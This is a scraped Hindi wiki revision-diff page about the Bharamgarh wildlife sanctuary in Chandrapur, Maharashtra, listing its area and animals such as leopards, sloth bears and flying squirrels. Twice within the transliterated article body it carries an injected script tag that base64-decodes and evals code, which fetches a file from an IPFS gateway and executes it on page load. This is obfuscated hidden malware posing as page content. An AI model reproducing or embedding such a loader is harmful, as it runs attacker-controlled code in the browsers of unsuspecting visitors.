Difference between revisions of "भरमगढ़ वन्यजीव अभयारण्य चन्द्रपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(2 intermediate revisions by 2 users not shown)
Line 3: Line 3:
 
*इस अभयारण्य में वन्यजीवों की विविध प्रजातियाँ पाई जाती हैं।  
 
*इस अभयारण्य में वन्यजीवों की विविध प्रजातियाँ पाई जाती हैं।  
 
*[[तेंदुआ|तेंदुए]], जंगली मुर्गा, वाइल्ड बोर, स्लोथ बीयर आदि यहाँ मुख्यत: रूप से पाए जाते हैं।  
 
*[[तेंदुआ|तेंदुए]], जंगली मुर्गा, वाइल्ड बोर, स्लोथ बीयर आदि यहाँ मुख्यत: रूप से पाए जाते हैं।  
*साथ ही बार्किंग डीयर, नीलगाय, [[मोर]], उडने वाली गिलहरी आदि पशु-पक्षियों को भी यहाँ देखा जा सकता है।  
+
*साथ ही बार्किंग डीयर, नीलगाय, [[मोर]], उडने वाली [[गिलहरी]] आदि पशु-पक्षियों को भी यहाँ देखा जा सकता है।  
 
*हिमलकासी लोक बिरादरी प्रोजेक्ट इस अभयारण्य के अन्तर्गत आता है।
 
*हिमलकासी लोक बिरादरी प्रोजेक्ट इस अभयारण्य के अन्तर्गत आता है।
 
{{प्रचार}}
 
{{प्रचार}}
Line 15: Line 15:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{महाराष्ट्र के पर्यटन स्थल}}
 
{{महाराष्ट्र के पर्यटन स्थल}}
 +
{{राष्ट्रीय उद्यान और अभयारण्य}}
 
[[Category:महाराष्ट्र]]
 
[[Category:महाराष्ट्र]]
 
[[Category:महाराष्ट्र के पर्यटन स्थल]]
 
[[Category:महाराष्ट्र के पर्यटन स्थल]]

Latest revision as of 07:02, 17 August 2011

  • bharamagadh vanyajiv abhyarany maharashtr ke chandrapur shahar mean sthit hai.
  • chandrapur zile ka yah vanyajiv abhayarany 105 varg ki. mi. kshetr mean phaila hua hai.
  • is abhayarany mean vanyajivoan ki vividh prajatiyaan paee jati haian.
  • teandue, jangali murga, vaild bor, sloth biyar adi yahaan mukhyat: roop se pae jate haian.
  • sath hi barkiang diyar, nilagay, mor, udane vali gilahari adi pashu-pakshiyoan ko bhi yahaan dekha ja sakata hai.
  • himalakasi lok biradari projekt is abhayarany ke antargat ata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>